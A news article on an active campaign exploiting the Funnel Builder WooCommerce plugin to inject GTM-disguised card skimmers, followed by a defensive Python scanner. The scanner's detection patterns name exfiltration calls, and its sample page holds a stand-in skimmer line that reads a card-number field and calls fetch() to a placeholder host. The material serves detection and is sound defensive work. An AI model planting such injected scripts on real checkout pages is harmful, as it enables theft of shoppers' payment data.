
Funnel Builder Plugin: Active Exploitation of WooCommerce Checkout Vulnerability

In short: Attackers are exploiting an unauthenticated vulnerability in the Funnel Builder plugin to inject malicious JavaScript skimmers on checkout pages and steal credit card data.

The WordPress plugin Funnel Builder is currently under active attack: attackers use it to inject malware into WooCommerce checkouts and steal payment data. All versions prior to 3.15.0.3 are affected, and the plugin runs on over 40,000 shops.

Security researchers from Dutch firm Sansec documented an ongoing exploitation campaign against the WordPress plugin Funnel Builder this week. The vulnerability allows unauthenticated attackers to inject arbitrary JavaScript code via the plugin’s “External Scripts” configuration on any checkout page of an affected shop.

The attackers disguise their code injections as legitimate Google Tag Manager scripts. Behind the scenes, these skimmers covertly extract payment data, particularly credit card numbers, CVV codes, and billing addresses during checkout. According to Sansec’s analysis, Funnel Builder exposes a checkout endpoint that allows incoming requests to execute arbitrary internal methods.

The plugin is used by over 40,000 WooCommerce shops. FunnelKit, the company behind Funnel Builder, released a patch with version 3.15.0.3. An official CVE identifier has not yet been assigned to the vulnerability. All versions prior to 3.15.0.3 are affected. Shop operators should update their installation immediately and check for suspicious external script entries in the plugin configurations.
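The article's closing advice is to look for suspicious script entries on checkout pages. The script below is an added example written for this page, not code from Sansec, FunnelKit or the plugin: it parses a checkout page's HTML, flags external scripts served from hosts outside an allowlist (calling out Google Tag Manager look-alikes, which is how the campaign described above disguises its injections), and flags inline scripts that both touch payment fields and make outbound requests. The allowlist, the field-name patterns, the `shop.example` and `gtm-cdn.invalid` hosts and the sample page are all constructed assumptions; tune the allowlist to the scripts your shop legitimately loads before running it against a saved copy of your own checkout page.

```python
"""Heuristic scan of a WooCommerce checkout page for injected script skimmers.

Added example for this article, not code from Sansec, FunnelKit or the plugin.
The allowlist, the regexes and the sample HTML below are constructed
assumptions; adjust them to the scripts your shop legitimately loads.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Hosts a checkout page is expected to load scripts from (assumption: per-shop).
ALLOWED_SCRIPT_HOSTS = {
    "www.googletagmanager.com",
    "www.google-analytics.com",
    "shop.example",  # placeholder for the shop's own origin
}

# Inline scripts that read payment fields AND send data elsewhere are suspicious.
PAYMENT_FIELD_RE = re.compile(r"card[_-]?number|cvv|cvc|billing", re.I)
EXFIL_RE = re.compile(r"\bfetch\(|XMLHttpRequest|sendBeacon|new Image\(", re.I)
GTM_LOOKALIKE_RE = re.compile(r"GTM-[A-Z0-9]+|googletagmanager", re.I)


class ScriptCollector(HTMLParser):
    """Collect every <script> tag with its src attribute and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []  # list of {"src": str | None, "body": str}
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self.scripts.append({"src": dict(attrs).get("src"), "body": ""})
            self._in_script = True

    def handle_data(self, data):
        # HTMLParser delivers <script> contents through handle_data (CDATA mode).
        if self._in_script and self.scripts:
            self.scripts[-1]["body"] += data

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False


def find_suspicious_scripts(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (reason, detail) tuples for each script that looks injected."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for script in parser.scripts:
        src, body = script["src"], script["body"].strip()
        if src:
            host = urlparse(src).hostname or ""
            if host not in allowed_hosts:
                reason = "external script from non-allowlisted host"
                if GTM_LOOKALIKE_RE.search(src):
                    reason += " (Google Tag Manager look-alike)"
                findings.append((reason, src))
            continue
        if PAYMENT_FIELD_RE.search(body) and EXFIL_RE.search(body):
            findings.append(("inline script reads payment fields and sends data", body[:80]))
    return findings


# Constructed sample page: a genuine-looking GTM snippet and loader, one GTM
# look-alike from a foreign host, a shop-local script, and a minimal inline
# script that touches a card field and calls fetch(). None of it is real.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});
var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;
j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-PLACEHOLDER');</script>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-PLACEHOLDER"></script>
<script src="https://gtm-cdn.invalid/gtm.js?id=GTM-PLACEHOLDER"></script>
<script src="https://shop.example/wp-content/plugins/woocommerce/assets/js/frontend/checkout.min.js"></script>
</head><body>
<script>document.querySelector("#card-number");fetch("https://gtm-cdn.invalid/c");</script>
</body></html>
"""

if __name__ == "__main__":
    for reason, detail in find_suspicious_scripts(SAMPLE_CHECKOUT_HTML):
        print(f"[!] {reason}: {detail}")
```

The genuine Google Tag Manager snippet and loader pass because they load only from `www.googletagmanager.com`; the look-alike is reported because the host differs even though the URL carries a `GTM-` id, and the inline script is reported because it combines a payment-field reference with an outbound call. A scan like this is a quick triage aid, not a substitute for updating the plugin and reviewing its "External Scripts" configuration directly.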


Source: ainews-dev.lumi-systems.io · Published May 16, 2026
Lumi AI News — AI-assisted curation pursuant to Art. 50 EU AI Act. Paraphrase and classification by Lumi News Pipeline v1.5.2.
